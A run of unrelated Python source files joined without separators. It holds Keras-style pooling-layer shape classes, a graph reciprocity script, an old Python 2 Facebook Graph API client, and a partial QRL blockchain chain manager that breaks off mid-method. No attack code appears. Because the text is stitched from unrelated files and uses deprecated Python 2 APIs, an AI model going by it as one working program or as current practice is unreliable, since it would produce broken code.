            len_dim2 = input_shape[2]
            len_dim3 = input_shape[3]
        else:
            raise Exception('Invalid dim_ordering: ' + self.dim_ordering)
        len_dim1 = conv_output_length(len_dim1, self.pool_size[0], self.border_mode, self.strides[0])
        len_dim2 = conv_output_length(len_dim2, self.pool_size[1], self.border_mode, self.strides[1])
        len_dim3 = conv_output_length(len_dim3, self.pool_size[2], self.border_mode, self.strides[2])
        if self.dim_ordering == 'channels_first':
            return (input_shape[0], input_shape[1], len_dim1, len_dim2, len_dim3)
        elif self.dim_ordering == 'channels_last':
            return (input_shape[0], len_dim1, len_dim2, len_dim3, input_shape[4])
        else:
            raise Exception('Invalid dim_ordering: ' + self.dim_ordering)

class LW_MaxPooling3D(_LW_Pooling3D):
    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='default'):
        super(LW_MaxPooling3D, self).__init__(pool_size, strides, border_mode, dim_ordering)

class LW_AveragePooling3D(_LW_Pooling3D):
    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='default'):
        super(LW_AveragePooling3D, self).__init__(pool_size, strides, border_mode, dim_ordering)

###############################################
class _LW_GlobalPooling1D(LW_Layer):
    def __init__(self):
        pass
    def get_output_shape_for(self, input_shape):
        return (input_shape[0], input_shape[2])

class LW_GlobalAveragePooling1D(_LW_GlobalPooling1D):
    pass

class LW_GlobalMaxPooling1D(_LW_GlobalPooling1D):
    pass

###############################################
class _LW_GlobalPooling2D(LW_Layer):

    def __init__(self, data_format='default'):
        if data_format == 'default':
            data_format = default_data_format
        self.dim_ordering = data_format
    def get_output_shape_for(self, input_shape):
        if self.dim_ordering == 'channels_last':
            return (input_shape[0], input_shape[3])
        else:
            return (input_shape[0], input_shape[1])

class LW_GlobalAveragePooling2D(_LW_GlobalPooling2D):
    pass

class LW_GlobalMaxPooling2D(_LW_GlobalPooling2D):
    pass

###############################################
class _LW_GlobalPooling3D(LW_Layer):
    def __init__(self, data_format='default'):
        if data_format == 'default':
            data_format = default_data_format
        self.dim_ordering = data_format
    def get_output_shape_for(self, input_shape):
        if self.dim_ordering == 'channels_last':
            return (input_shape[0], input_shape[4])
        else:
            return (input_shape[0], input_shape[1])

class LW_GlobalAveragePooling3D(_LW_GlobalPooling3D):
    pass

class LW_GlobalMaxPooling3D(_LW_GlobalPooling3D):
    pass

###############################################
if __name__ == '__main__':
    pass
import sys

tagging_filepath = sys.argv[1]
following_filepath = sys.argv[2]

delim = '\t'
if len(sys.argv) > 3:
    delim = sys.argv[3]

graph = {}
for line in open(tagging_filepath):
    entry = line.rstrip().split('\t')
    src = entry[0]
    dst = entry[1]
    if not src in graph: graph[src] = {}
    graph[src][dst] = 0

for line in open(following_filepath):
    entry = line.rstrip().split('\t')
    src = entry[0]
    dst = entry[1]
    if src in graph and dst in graph[src]:
        graph[src][dst] += 1
    if dst in graph and src in graph[dst]:
        graph[dst][src] += 2

w_dir = 0
wo_dir = 0
count = 0.0
for src in graph:
    for dst in graph[src]:
        val = graph[src][dst]
        count += 1
        if val in [1,3]:
            w_dir += 1
        if val in [1,2,3]:
            wo_dir += 1

print "%s\t%s" % (w_dir/count, wo_dir/count)

#!/usr/bin/env python
#
# Copyright 2010 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""Python client library for the Facebook Platform.

This client library is designed to support the Graph API and the
official Facebook JavaScript SDK, which is the canonical way to
implement Facebook authentication. Read more about the Graph API at
http://developers.facebook.com/docs/api. You can download the Facebook
JavaScript SDK at http://github.com/facebook/connect-js/.

If your application is using Google AppEngine's webapp framework, your
usage of this module might look like this:

user = facebook.get_user_from_cookie(self.request.cookies, key, secret)
if user:
graph = facebook.GraphAPI(user["access_token"])
profile = graph.get_object("me")
friends = graph.get_connections("me", "friends")

"""

import cgi
import time
import urllib
import urllib2
import httplib
import hashlib
import hmac
import base64
import logging
import socket

# Find a JSON parser
try:
    import simplejson as json
except ImportError:
    try:
        from django.utils import simplejson as json
    except ImportError:
        import json
_parse_json = json.loads

# Find a query string parser
try:
    from urlparse import parse_qs
except ImportError:
    from cgi import parse_qs


class GraphAPI(object):
    """A client for the Facebook Graph API.

See http://developers.facebook.com/docs/api for complete
documentation for the API.

The Graph API is made up of the objects in Facebook (e.g., people,
pages, events, photos) and the connections between them (e.g.,
friends, photo tags, and event RSVPs). This client provides access
to those primitive types in a generic way. For example, given an
OAuth access token, this will fetch the profile of the active user
and the list of the user's friends:

graph = facebook.GraphAPI(access_token)
user = graph.get_object("me")
friends = graph.get_connections(user["id"], "friends")

You can see a list of all of the objects and connections supported
by the API at http://developers.facebook.com/docs/reference/api/.

You can obtain an access token via OAuth or by using the Facebook
JavaScript SDK. See
http://developers.facebook.com/docs/authentication/ for details.

If you are using the JavaScript SDK, you can use the
get_user_from_cookie() method below to get the OAuth access token
for the active user from the cookie saved by the SDK.

"""
    def __init__(self, access_token=None, timeout=None):
        self.access_token = access_token
        self.timeout = timeout

    def get_object(self, id, **args):
        """Fetchs the given object from the graph."""
        return self.request(id, args)

    def get_objects(self, ids, **args):
        """Fetchs all of the given object from the graph.

We return a map from ID to object. If any of the IDs are
invalid, we raise an exception.
"""
        args["ids"] = ",".join(ids)
        return self.request("", args)

    def get_connections(self, id, connection_name, **args):
        """Fetchs the connections for given object."""
        return self.request(id + "/" + connection_name, args)

    def put_object(self, parent_object, connection_name, **data):
        """Writes the given object to the graph, connected to the given parent.

For example,

graph.put_object("me", "feed", message="Hello, world")

writes "Hello, world" to the active user's wall. Likewise, this
will comment on a the first post of the active user's feed:

feed = graph.get_connections("me", "feed")
post = feed["data"][0]
graph.put_object(post["id"], "comments", message="First!")

See http://developers.facebook.com/docs/api#publishing for all
of the supported writeable objects.

Certain write operations require extended permissions. For
example, publishing to a user's feed requires the
"publish_actions" permission. See
http://developers.facebook.com/docs/publishing/ for details
about publishing permissions.

"""
        assert self.access_token, "Write operations require an access token"
        return self.request(parent_object + "/" + connection_name,
                            post_args=data)

    def put_wall_post(self, message, attachment={}, profile_id="me"):
        """Writes a wall post to the given profile's wall.

We default to writing to the authenticated user's wall if no
profile_id is specified.

attachment adds a structured attachment to the status message
being posted to the Wall. It should be a dictionary of the form:

{"name": "Link name"
"link": "http://www.example.com/",
"caption": "{*actor*} posted a new review",
"description": "This is a longer description of the attachment",
"picture": "http://www.example.com/thumbnail.jpg"}

"""
        return self.put_object(profile_id, "feed", message=message,
                               **attachment)

    def put_comment(self, object_id, message):
        """Writes the given comment on the given post."""
        return self.put_object(object_id, "comments", message=message)

    def put_like(self, object_id):
        """Likes the given post."""
        return self.put_object(object_id, "likes")

    def delete_object(self, id):
        """Deletes the object with the given ID from the graph."""
        self.request(id, post_args={"method": "delete"})

    def delete_request(self, user_id, request_id):
        """Deletes the Request with the given ID for the given user."""
        conn = httplib.HTTPSConnection('graph.facebook.com')

        url = '/%s_%s?%s' % (
            request_id,
            user_id,
            urllib.urlencode({'access_token': self.access_token}),
        )
        conn.request('DELETE', url)
        response = conn.getresponse()
        data = response.read()

        response = _parse_json(data)
        # Raise an error if we got one, but don't not if Facebook just
        # gave us a Bool value
        if (response and isinstance(response, dict) and response.get("error")):
            raise GraphAPIError(response)

        conn.close()

    def put_photo(self, image, message=None, album_id=None, **kwargs):
        """Uploads an image using multipart/form-data.

image=File like object for the image
message=Caption for your image
album_id=None posts to /me/photos which uses or creates and uses
an album for your application.

"""
        object_id = album_id or "me"
        #it would have been nice to reuse self.request;
        #but multipart is messy in urllib
        post_args = {
            'access_token': self.access_token,
            'source': image,
            'message': message,
        }
        post_args.update(kwargs)
        content_type, body = self._encode_multipart_form(post_args)
        req = urllib2.Request(("https://graph.facebook.com/%s/photos" %
                               object_id),
                              data=body)
        req.add_header('Content-Type', content_type)
        try:
            data = urllib2.urlopen(req).read()
        #For Python 3 use this:
        #except urllib2.HTTPError as e:
        except urllib2.HTTPError, e:
            data = e.read() # Facebook sends OAuth errors as 400, and urllib2
                             # throws an exception, we want a GraphAPIError
        try:
            response = _parse_json(data)
            # Raise an error if we got one, but don't not if Facebook just
            # gave us a Bool value
            if (response and isinstance(response, dict) and
                    response.get("error")):
                raise GraphAPIError(response)
        except ValueError:
            response = data

        return response

    # based on: http://code.activestate.com/recipes/146306/
    def _encode_multipart_form(self, fields):
        """Encode files as 'multipart/form-data'.

Fields are a dict of form name-> value. For files, value should
be a file object. Other file-like objects might work and a fake
name will be chosen.

Returns (content_type, body) ready for httplib.HTTP instance.

"""
        BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'
        CRLF = '\r\n'
        L = []
        for (key, value) in fields.items():
            logging.debug("Encoding %s, (%s)%s" % (key, type(value), value))
            if not value:
                continue
            L.append('--' + BOUNDARY)
            if hasattr(value, 'read') and callable(value.read):
                filename = getattr(value, 'name', '%s.jpg' % key)
                L.append(('Content-Disposition: form-data;'
                          'name="%s";'
                          'filename="%s"') % (key, filename))
                L.append('Content-Type: image/jpeg')
                value = value.read()
                logging.debug(type(value))
            else:
                L.append('Content-Disposition: form-data; name="%s"' % key)
            L.append('')
            if isinstance(value, unicode):
                logging.debug("Convert to ascii")
                value = value.encode('ascii')
            L.append(value)
        L.append('--' + BOUNDARY + '--')
        L.append('')
        body = CRLF.join(L)
        content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
        return content_type, body

    def request(self, path, args=None, post_args=None):
        """Fetches the given path in the Graph API.

We translate args to a valid query string. If post_args is
given, we send a POST request to the given path with the given
arguments.

"""
        args = args or {}

        if self.access_token:
            if post_args is not None:
                post_args["access_token"] = self.access_token
            else:
                args["access_token"] = self.access_token
        post_data = None if post_args is None else urllib.urlencode(post_args)
        try:
            file = urllib2.urlopen("https://graph.facebook.com/" + path + "?" +
                                   urllib.urlencode(args),
                                   post_data, timeout=self.timeout)
        except urllib2.HTTPError, e:
            response = _parse_json(e.read())
            raise GraphAPIError(response)
        except TypeError:
            # Timeout support for Python <2.6
            if self.timeout:
                socket.setdefaulttimeout(self.timeout)
            file = urllib2.urlopen("https://graph.facebook.com/" + path + "?" +
                                   urllib.urlencode(args), post_data)
        try:
            fileInfo = file.info()
            if fileInfo.maintype == 'text':
                response = _parse_json(file.read())
            elif fileInfo.maintype == 'image':
                mimetype = fileInfo['content-type']
                response = {
                    "data": file.read(),
                    "mime-type": mimetype,
                    "url": file.url,
                }
            else:
                raise GraphAPIError('Maintype was not text or image')
        finally:
            file.close()
        if response and isinstance(response, dict) and response.get("error"):
            raise GraphAPIError(response["error"]["type"],
                                response["error"]["message"])
        return response

    def fql(self, query, args=None, post_args=None):
        """FQL query.

Example query: "SELECT affiliations FROM user WHERE uid = me()"

"""
        args = args or {}
        if self.access_token:
            if post_args is not None:
                post_args["access_token"] = self.access_token
            else:
                args["access_token"] = self.access_token
        post_data = None if post_args is None else urllib.urlencode(post_args)

        """Check if query is a dict and
use the multiquery method
else use single query
"""
        if not isinstance(query, basestring):
            args["queries"] = query
            fql_method = 'fql.multiquery'
        else:
            args["query"] = query
            fql_method = 'fql.query'

        args["format"] = "json"

        try:
            file = urllib2.urlopen("https://api.facebook.com/method/" +
                                   fql_method + "?" + urllib.urlencode(args),
                                   post_data, timeout=self.timeout)
        except TypeError:
            # Timeout support for Python <2.6
            if self.timeout:
                socket.setdefaulttimeout(self.timeout)
            file = urllib2.urlopen("https://api.facebook.com/method/" +
                                   fql_method + "?" + urllib.urlencode(args),
                                   post_data)

        try:
            content = file.read()
            response = _parse_json(content)
            #Return a list if success, return a dictionary if failed
            if type(response) is dict and "error_code" in response:
                raise GraphAPIError(response)
        except Exception, e:
            raise e
        finally:
            file.close()

        return response

    def extend_access_token(self, app_id, app_secret):
        """
Extends the expiration time of a valid OAuth access token. See
<https://developers.facebook.com/roadmap/offline-access-removal/
#extend_token>

"""
        args = {
            "client_id": app_id,
            "client_secret": app_secret,
            "grant_type": "fb_exchange_token",
            "fb_exchange_token": self.access_token,
        }
        response = urllib.urlopen("https://graph.facebook.com/oauth/"
                                  "access_token?" +
                                  urllib.urlencode(args)).read()
        query_str = parse_qs(response)
        if "access_token" in query_str:
            result = {"access_token": query_str["access_token"][0]}
            if "expires" in query_str:
                result["expires"] = query_str["expires"][0]
            return result
        else:
            response = json.loads(response)
            raise GraphAPIError(response)


class GraphAPIError(Exception):
    def __init__(self, result):
        #Exception.__init__(self, message)
        #self.type = type
        self.result = result
        try:
            self.type = result["error_code"]
        except:
            self.type = ""

        # OAuth 2.0 Draft 10
        try:
            self.message = result["error_description"]
        except:
            # OAuth 2.0 Draft 00
            try:
                self.message = result["error"]["message"]
            except:
                # REST server style
                try:
                    self.message = result["error_msg"]
                except:
                    self.message = result

        Exception.__init__(self, self.message)


def get_user_from_cookie(cookies, app_id, app_secret):
    """Parses the cookie set by the official Facebook JavaScript SDK.

cookies should be a dictionary-like object mapping cookie names to
cookie values.

If the user is logged in via Facebook, we return a dictionary with
the keys "uid" and "access_token". The former is the user's
Facebook ID, and the latter can be used to make authenticated
requests to the Graph API. If the user is not logged in, we
return None.

Download the official Facebook JavaScript SDK at
http://github.com/facebook/connect-js/. Read more about Facebook
authentication at
http://developers.facebook.com/docs/authentication/.

"""
    cookie = cookies.get("fbsr_" + app_id, "")
    if not cookie:
        return None
    parsed_request = parse_signed_request(cookie, app_secret)
    if not parsed_request:
        return None
    try:
        result = get_access_token_from_code(parsed_request["code"], "",
                                            app_id, app_secret)
    except GraphAPIError:
        return None
    result["uid"] = parsed_request["user_id"]
    return result


def parse_signed_request(signed_request, app_secret):
    """ Return dictionary with signed request data.

We return a dictionary containing the information in the
signed_request. This includes a user_id if the user has authorised
your application, as well as any information requested.

If the signed_request is malformed or corrupted, False is returned.

"""
    try:
        encoded_sig, payload = map(str, signed_request.split('.', 1))

        sig = base64.urlsafe_b64decode(encoded_sig + "=" *
                                       ((4 - len(encoded_sig) % 4) % 4))
        data = base64.urlsafe_b64decode(payload + "=" *
                                        ((4 - len(payload) % 4) % 4))
    except IndexError:
        # Signed request was malformed.
        return False
    except TypeError:
        # Signed request had a corrupted payload.
        return False

    data = _parse_json(data)
    if data.get('algorithm', '').upper() != 'HMAC-SHA256':
        return False

    # HMAC can only handle ascii (byte) strings
    # http://bugs.python.org/issue5285
    app_secret = app_secret.encode('ascii')
    payload = payload.encode('ascii')

    expected_sig = hmac.new(app_secret,
                            msg=payload,
                            digestmod=hashlib.sha256).digest()
    if sig != expected_sig:
        return False

    return data


def auth_url(app_id, canvas_url, perms=None, **kwargs):
    url = "https://www.facebook.com/dialog/oauth?"
    kvps = {'client_id': app_id, 'redirect_uri': canvas_url}
    if perms:
        kvps['scope'] = ",".join(perms)
    kvps.update(kwargs)
    return url + urllib.urlencode(kvps)

def get_access_token_from_code(code, redirect_uri, app_id, app_secret):
    """Get an access token from the "code" returned from an OAuth dialog.

Returns a dict containing the user-specific access token and its
expiration date (if applicable).

"""
    args = {
        "code": code,
        "redirect_uri": redirect_uri,
        "client_id": app_id,
        "client_secret": app_secret,
    }
    # We would use GraphAPI.request() here, except for that the fact
    # that the response is a key-value pair, and not JSON.
    response = urllib.urlopen("https://graph.facebook.com/oauth/access_token" +
                              "?" + urllib.urlencode(args)).read()
    query_str = parse_qs(response)
    if "access_token" in query_str:
        result = {"access_token": query_str["access_token"][0]}
        if "expires" in query_str:
            result["expires"] = query_str["expires"][0]
        return result
    else:
        response = json.loads(response)
        raise GraphAPIError(response)


def get_app_access_token(app_id, app_secret):
    """Get the access_token for the app.

This token can be used for insights and creating test users.

app_id = retrieved from the developer page
app_secret = retrieved from the developer page

Returns the application access_token.

"""
    # Get an app access token
    args = {'grant_type': 'client_credentials',
            'client_id': app_id,
            'client_secret': app_secret}

    file = urllib2.urlopen("https://graph.facebook.com/oauth/access_token?" +
                           urllib.urlencode(args))

    try:
        result = file.read().split("=")[1]
    finally:
        file.close()

    return result

# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
import threading
from typing import Optional, Tuple

from pyqrllib.pyqrllib import bin2hstr
from pyqryptonight.pyqryptonight import StringToUInt256, UInt256ToString

from qrl.core import config, BlockHeader
from qrl.core.AddressState import AddressState
from qrl.core.Block import Block
from qrl.core.BlockMetadata import BlockMetadata
from qrl.core.DifficultyTracker import DifficultyTracker
from qrl.core.GenesisBlock import GenesisBlock
from qrl.core.PoWValidator import PoWValidator
from qrl.core.txs.Transaction import Transaction
from qrl.core.txs.CoinBase import CoinBase
from qrl.core.TransactionPool import TransactionPool
from qrl.core.misc import logger
from qrl.crypto.Qryptonight import Qryptonight
from qrl.generated import qrl_pb2, qrlstateinfo_pb2


class ChainManager:
    def __init__(self, state):
        self._state = state
        self.tx_pool = TransactionPool(None)
        self._last_block = Block.deserialize(GenesisBlock().serialize())
        self.current_difficulty = StringToUInt256(str(config.user.genesis_difficulty))

        self.trigger_miner = False
        self.lock = threading.RLock()

    @property
    def height(self):
        with self.lock:
            if not self._last_block:
                return -1
            return self._last_block.block_number

    @property
    def last_block(self) -> Block:
        with self.lock:
            return self._last_block

    @property
    def total_coin_supply(self):
        with self.lock:
            return self._state.total_coin_supply

    def get_block_datapoint(self, headerhash):
        with self.lock:
            return self._state.get_block_datapoint(headerhash)

    def get_cumulative_difficulty(self):
        with self.lock:
            last_block_metadata = self._state.get_block_metadata(self._last_block.headerhash)
            return last_block_metadata.cumulative_difficulty

    def get_block_by_number(self, block_number) -> Optional[Block]:
        with self.lock:
            return self._state.get_block_by_number(block_number)

    def get_block_header_hash_by_number(self, block_number) -> Optional[bytes]:
        with self.lock:
            return self._state.get_block_header_hash_by_number(block_number)

    def get_block(self, header_hash: bytes) -> Optional[Block]:
        with self.lock:
            return self._state.get_block(header_hash)

    def get_address_balance(self, address: bytes) -> int:
        with self.lock:
            return self._state.get_address_balance(address)

    def get_address_is_used(self, address: bytes) -> bool:
        with self.lock:
            return self._state.get_address_is_used(address)

    def get_address_state(self, address: bytes) -> AddressState:
        with self.lock:
            return self._state.get_address_state(address)

    def get_all_address_state(self):
        with self.lock:
            return self._state.get_all_address_state()

    def get_tx_metadata(self, transaction_hash) -> list:
        with self.lock:
            return self._state.get_tx_metadata(transaction_hash)

    def get_last_transactions(self):
        with self.lock:
            return self._state.get_last_txs()

    def get_unconfirmed_transaction(self, transaction_hash) -> list:
        with self.lock:
            for tx_set in self.tx_pool.transactions:
                tx = tx_set[1].transaction
                if tx.txhash == transaction_hash:
                    return [tx, tx_set[1].timestamp]
            if transaction_hash in self.tx_pool.pending_tx_pool_hash:
                for tx_set in self.tx_pool.pending_tx_pool:
                    tx = tx_set[1].transaction
                    if tx.txhash == transaction_hash:
                        return [tx, tx_set[1].timestamp]

            return []

    def get_block_metadata(self, header_hash: bytes) -> Optional[BlockMetadata]:
        with self.lock:
            return self._state.get_block_metadata(header_hash)

    def get_blockheader_and_metadata(self, block_number=0) -> Tuple:
        with self.lock:
            block_number = block_number or self.height  # if both are non-zero, then block_number takes priority

            result = (None, None)
            block = self.get_block_by_number(block_number)
            if block:
                blockheader = block.blockheader
                blockmetadata = self.get_block_metadata(blockheader.headerhash)
                result = (blockheader, blockmetadata)

            return result

    def get_block_to_mine(self, miner, wallet_address) -> list:
        with miner.lock:  # Trying to acquire miner.lock to make sure pre_block_logic is not running
            with self.lock:
                last_block = self.last_block
                last_block_metadata = self.get_block_metadata(last_block.headerhash)
                return miner.get_block_to_mine(wallet_address,
                                               self.tx_pool,
                                               last_block,
                                               last_block_metadata.block_difficulty)

    def get_measurement(self, block_timestamp, parent_headerhash, parent_metadata: BlockMetadata):
        with self.lock:
            return self._state.get_measurement(block_timestamp, parent_headerhash, parent_metadata)

    def get_block_size_limit(self, block: Block):
        with self.lock:
            return self._state.get_block_size_limit(block)

    def get_block_is_duplicate(self, block: Block) -> bool:
        with self.lock:
            return self._state.get_block(block.headerhash) is not None

    def validate_mining_nonce(self, blockheader: BlockHeader, enable_logging=True):
        with self.lock:
            parent_metadata = self.get_block_metadata(blockheader.prev_headerhash)
            parent_block = self._state.get_block(blockheader.prev_headerhash)

            measurement = self.get_measurement(blockheader.timestamp, blockheader.prev_headerhash, parent_metadata)
            diff, target = DifficultyTracker.get(
                measurement=measurement,
                parent_difficulty=parent_metadata.block_difficulty)

            if enable_logging:
                logger.debug('-----------------START--------------------')
                logger.debug('Validate                #%s', blockheader.block_number)
                logger.debug('block.timestamp         %s', blockheader.timestamp)
                logger.debug('parent_block.timestamp  %s', parent_block.timestamp)
                logger.debug('parent_block.difficulty %s', UInt256ToString(parent_metadata.block_difficulty))
                logger.debug('diff                    %s', UInt256ToString(diff))
                logger.debug('target                  %s', bin2hstr(target))
                logger.debug('-------------------END--------------------')

            if not PoWValidator().verify_input(blockheader.mining_blob, target):
                if enable_logging:
                    logger.warning("PoW verification failed")
                    qn = Qryptonight()
                    tmp_hash = qn.hash(blockheader.mining_blob)
                    logger.warning("{}".format(bin2hstr(tmp_hash)))
                    logger.debug('%s', blockheader.to_json())
                return False

            return True

    def get_headerhashes(self, start_blocknumber):
        with self.lock:
            start_blocknumber = max(0, start_blocknumber)
            end_blocknumber = min(self._last_block.block_number,
                                  start_blocknumber + 2 * config.dev.reorg_limit)

            total_expected_headerhash = end_blocknumber - start_blocknumber + 1

            node_header_hash = qrl_pb2.NodeHeaderHash()
            node_header_hash.block_number = start_blocknumber

            block = self._state.get_block_by_number(end_blocknumber)
            block_headerhash = block.headerhash
            node_header_hash.headerhashes.append(block_headerhash)
            end_blocknumber -= 1

            while end_blocknumber >= start_blocknumber:
                block_metadata = self._state.get_block_metadata(block_headerhash)
                for headerhash in block_metadata.last_N_headerhashes[-1::-1]:
                    node_header_hash.headerhashes.append(headerhash)
                end_blocknumber -= len(block_metadata.last_N_headerhashes)
                if len(block_metadata.last_N_headerhashes) == 0:
                    break
                block_headerhash = block_metadata.last_N_headerhashes[0]

            node_header_hash.headerhashes[:] = node_header_hash.headerhashes[-1::-1]
            del node_header_hash.headerhashes[:len(node_header_hash.headerhashes) - total_expected_headerhash]

            return node_header_hash

    def set_broadcast_tx(self, broadcast_tx):
        with self.lock:
            self.tx_pool.set_broadcast_tx(broadcast_tx)

    def load(self, genesis_block):
        # load() has the following tasks:
        # Write Genesis Block into State immediately
        # Register block_number <-> blockhash mapping
        # Calculate difficulty Metadata for Genesis Block
        # Generate AddressStates from Genesis Block balances
        # Apply Genesis Block's transactions to the state
        # Detect if we are forked from genesis block and if so initiate recovery.
        height = self._state.get_mainchain_height()

        if height == -1:
            self._state.put_block(genesis_block, None)
            block_number_mapping = qrl_pb2.BlockNumberMapping(headerhash=genesis_block.headerhash,
                                                              prev_headerhash=genesis_block.prev_headerhash)

            self._state.put_block_number_mapping(genesis_block.block_number, block_number_mapping, None)
            parent_difficulty = StringToUInt256(str(config.user.genesis_difficulty))

            self.current_difficulty, _ = DifficultyTracker.get(
                measurement=config.dev.mining_setpoint_blocktime,
                parent_difficulty=parent_difficulty)

            block_metadata = BlockMetadata.create()
            block_metadata.set_block_difficulty(self.current_difficulty)
            block_metadata.set_cumulative_difficulty(self.current_difficulty)

            self._state.put_block_metadata(genesis_block.headerhash, block_metadata, None)
            addresses_state = dict()
            for genesis_balance in GenesisBlock().genesis_balance:
                bytes_addr = genesis_balance.address
                addresses_state[bytes_addr] = AddressState.get_default(bytes_addr)
                addresses_state[bytes_addr]._data.balance = genesis_balance.balance

            for tx_idx in range(1, len(genesis_block.transactions)):
                tx = Transaction.from_pbdata(genesis_block.transactions[tx_idx])
                for addr in tx.addrs_to:
                    addresses_state[addr] = AddressState.get_default(addr)

            coinbase_tx = Transaction.from_pbdata(genesis_block.transactions[0])

            if not isinstance(coinbase_tx, CoinBase):
                return False

            addresses_state[coinbase_tx.addr_to] = AddressState.get_default(coinbase_tx.addr_to)

            if not coinbase_tx.validate_extended(genesis_block.block_number):
                return False

            coinbase_tx.apply_state_changes(addresses_state)

            for tx_idx in range(1, len(genesis_block.transactions)):
                tx = Transaction.from_pbdata(genesis_block.transactions[tx_idx])
                tx.apply_state_changes(addresses_state)

            self._state.put_addresses_state(addresses_state)
            self._state.update_tx_metadata(genesis_block, None)
            self._state.update_mainchain_height(0, None)
        else:
            self._last_block = self.get_block_by_number(height)
            self.current_difficulty = self._state.get_block_metadata(self._last_block.headerhash).block_difficulty
            fork_state = self._state.get_fork_state()
            if fork_state:
                block = self._state.get_block(fork_state.initiator_headerhash)
                self._fork_recovery(block, fork_state)

    def _apply_block(self, block: Block, batch) -> bool:
        address_set = self._state.prepare_address_list(block)  # Prepare list for current block
        addresses_state = self._state.get_state_mainchain(address_set)
        if not block.apply_state_changes(addresses_state):
            return False
        self._state.put_addresses_state(addresses_state, batch)
        return True

    def _update_chainstate(self, block: Block, batch):
        self._last_block = block
        self._update_block_number_mapping(block, batch)
        self.tx_pool.remove_tx_in_block_from_pool(block)
        self._state.update_mainchain_height(block.block_number, batch)
        self._state.update_tx_metadata(block, batch)

    def _try_branch_add_block(self, block, batch, check_stale=True) -> (bool, bool):
        """
        This function returns list of bool types. The first bool represent
        if the block has been added successfully and the second bool
        represent the fork_flag, which becomes true when a block triggered
        into fork recovery.
        :param block:
        :param batch:
        :return: [Added successfully, fork_flag]
        """
        if self._last_block.headerhash == block.prev_headerhash:
            if not self._apply_block(block, batch):
                return False, False

        self._state.put_block(block, batch)

        last_block_metadata = self._state.get_block_metadata(self._last_block.headerhash)
        if last_block_metadata is None:
            logger.warning("Could not find log metadata for %s", bin2hstr(self._last_block.headerhash))
            return False, False

        last_block_difficulty = int(UInt256ToString(last_block_metadata.cumulative_difficulty))

        new_block_metadata = self._add_block_metadata(block.headerhash, block.timestamp, block.prev_headerhash, batch)
        new_block_difficulty = int(UInt256ToString(new_block_metadata.cumulative_difficulty))

        if new_block_difficulty > last_block_difficulty:
            if self._last_block.headerhash != block.prev_headerhash:
                fork_state = qrlstateinfo_pb2.ForkState(initiator_headerhash=block.headerhash)
                self._state.put_fork_state(fork_state, batch)
                self._state.write_batch(batch)
                return self._fork_recovery(block, fork_state), True

            self._update_chainstate(block, batch)
            if check_stale:
                self.tx_pool.check_stale_txn(self._state, block.block_number)
            self.trigger_miner = True

        return True, False

    def _remove_block_from_mainchain(self, block: Block, latest_block_number: int, batch):
        addresses_set = self._state.prepare_address_list(block)
        addresses_state = self._state.get_state_mainchain(addresses_set)
        for tx_idx in range(len(block.transactions) - 1, -1, -1):
            tx = Transaction.from_pbdata(block.transactions[tx_idx])
            tx.revert_state_changes(addresses_state, self)

        self.tx_pool.add_tx_from_block_to_pool(block, latest_block_number)
        self._state.update_mainchain_height(block.block_number - 1, batch)
        self._state.rollback_tx_metadata(block, batch)
        self._state.remove_blocknumber_mapping(block.block_number, batch)
        self._state.put_addresses_state(addresses_state, batch)

    def _get_fork_point(self, block: Block):
        tmp_block = block
        hash_path = []
        while True:
            if not block:
                raise Exception('[get_state] No Block Found %s, Initiator %s', block.headerhash, tmp_block.headerhash)
            mainchain_block = self.get_block_by_number(block.block_number)
            if mainchain_block and mainchain_block.headerhash == block.headerhash:
                break
            if block.block_number == 0:
                raise Exception('[get_state] Alternate chain genesis is different, Initiator %s', tmp_block.headerhash)
            hash_path.append(block.headerhash)
            block = self._state.get_block(block.prev_headerhash)

        return block.headerhash, hash_path

    def _rollback(self, forked_header_hash: bytes, fork_state: qrlstateinfo_pb2.ForkState = None):
        """
        Rollback from last block to the block just before the forked_header_hash
        :param forked_header_hash:
        :param fork_state:
        :return:
        """
        hash_path = []
        while self._last_block.headerhash != forked_header_hash:
            block = self._state.get_block(self._last_block.headerhash)
            mainchain_block = self._state.get_block_by_number(block.block_number)

            if block is None:
                logger.warning("self.state.get_block(self.last_block.headerhash) returned None")

            if mainchain_block is None:
                logger.warning("self.get_block_by_number(block.block_number) returned None")

            if block.headerhash != mainchain_block.headerhash:
                break
            hash_path.append(self._last_block.headerhash)

            batch = self._state.batch
            self._remove_block_from_mainchain(self._last_block, block.block_number, batch)

            if fork_state:
                fork_state.old_mainchain_hash_path.extend([self._last_block.headerhash])
                self._state.put_fork_state(fork_state, batch)

            self._state.write_batch(batch)

            self._last_block = self._state.get_block(self._last_block.prev_headerhash)

        return hash_path

    def add_chain(self, hash_path: list, fork_state: qrlstateinfo_pb2.ForkState) -> bool:
        """
        Add series of blocks whose headerhash mentioned into hash_path
        :param hash_path:
        :param fork_state:
        :param batch:
        :return:
        """
        with self.lock:
            start = 0
            try:
                start = hash_path.index(self._last_block.headerhash) + 1
            except ValueError:
                # Following condition can only be true if the fork recovery was interrupted last time
                if self._last_block.headerhash in fork_state.old_mainchain_hash_path:
                    return False

            for i in range(start, len(hash_path)):
                header_hash = hash_path[i]
                block = self._state.get_block(header_hash)

                batch = self._state.batch

                if not self._apply_block(block, batch):
                    return False

                self._update_chainstate(block, batch)

                logger.debug('Apply block #%d - [batch %d | %s]', block.block_number, i, hash_path[i])
                self._state.write_batch(batch)

            self._state.delete_fork_state()

            return True

    def _fork_recovery(self, block: Block, fork_state: qrlstateinfo_pb2.ForkState) -> bool:
        logger.info("Triggered Fork Recovery")
        # This condition only becomes true, when fork recovery was interrupted
        if fork_state.fork_point_headerhash:
            logger.info("Recovering from last fork recovery interruption")
            forked_header_hash, hash_path = fork_state.fork_point_headerhash, fork_state.new_mainchain_hash_path
        else:
            forked_header_hash, hash_path = self._get_fork_point(block)
            fork_state.fork_point_headerhash = forked_header_hash
